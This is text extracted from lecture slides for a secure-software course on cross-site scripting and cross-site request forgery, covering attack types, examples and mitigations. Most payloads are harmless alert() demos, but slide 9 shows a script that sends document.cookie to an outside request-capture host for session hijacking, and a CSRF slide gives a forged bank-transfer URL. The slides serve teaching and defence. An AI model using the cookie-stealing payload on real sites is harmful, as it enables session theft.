VOTD: XSS & CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1
What is XSS? XSS: Cross Site Scripting ● Injecting malicious scripts into a web page ● CWE-79 ● SWEN-331: Engineering Secure Software Benjamin S Meyers 2
Types of XSS Stored ● The malicious script gets saved to the webserver ○ Usually stored in a database ○ Reflected ● The malicious script does not get saved to the webserver, but its ○ execution is reflected in the website’s results/GUI DOM: Document Object Model ● DOM environment is being changed, but the website code ○ remains unchanged SWEN-331: Engineering Secure Software Benjamin S Meyers 3
Reflected XSS Example ● <script>alert(“You’ve been hacked!”)</script> SWEN-331: Engineering Secure Software Benjamin S Meyers 4
Reflected XSS Example ● <img src=“http://www.page.com/img.jpg”> SWEN-331: Engineering Secure Software Benjamin S Meyers 5
Stored XSS Example Same as reflected, but the malicious script gets saved in the ● database and executed every time the field with the script gets displayed on the page DVWA → XSS (Stored) ● Enter <script>alert(“You’ve been hacked!”)</script> in the ○ comments box Every time you hit “Sign Guestbook”, the script will execute again ○ SWEN-331: Engineering Secure Software Benjamin S Meyers 6
DOM XSS Example Changing the DOM environment in a browser causes the ● client-side code (which is unchanged) to execute differently Normal URL: ● http://testing.com/book.html?default=1 Attacked URL: http://testing.com/book.html?default=<script>alert(document.cookie)</script> SWEN-331: Engineering Secure Software Benjamin S Meyers 7
Mitigations Defense in Depth ● Thorough input validation ○ Accept only known good inputs (e.g. whitelist) ○ Escape special characters (e.g. < to < ) ○ Code reviews! ● Automated testing ● Fuzzers! ○ Input sanitization libraries ● Ruby on Rails: sanitize gem ○ SWEN-331: Engineering Secure Software Benjamin S Meyers 8
Notes Commonly used for session hijacking ● <script> x = new XMLHttpRequest(); x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true); x.send(); </script> Has been used against GMail, Twitter, Facebook, Yahoo, etc. ● Good discussion of XSS and exploits ● Not just <script> tags ● e.g. CSS injection ○ e.g. Image metadata ○ e.g. File uploads (fake images that are actually PHP scripts) ○ SWEN-331: Engineering Secure Software Benjamin S Meyers 9
What is CSRF? CSRF: Cross Site Request Forgery ● XSS exploits the trust that a client has for a website ○ CSRF exploits the trust that a site has for the user ○ Running malicious scripts on behalf of an authenticated user ● Usually: when an HTTP GET request makes a persistent ● modification, then you can get users to make changes to other websites they are already authenticated into CWE-352 ● SWEN-331: Engineering Secure Software Benjamin S Meyers 10 10
CSRF Examples Malicious links in emails sent from a trusted address ● Modifying arguments in a URL query string to cause ● malicious behavior ○ http://bank.com/transfer.do?acct=BEN&amount=100000 SWEN-331: Engineering Secure Software Benjamin S Meyers 11 11
Mitigations Don’t allow GET actions to make persistent modifications ● If you have to use GET, make it re-authenticate ○ Don’t allow session tokens in URL query strings, only cookies ● Don’t load images in emails from untrusted addresses ● Image metadata can contain scripts that get run when loaded ○ Don’t open emails from untrusted addresses, period ● SWEN-331: Engineering Secure Software Benjamin S Meyers 12 12
Recommend
More recommend
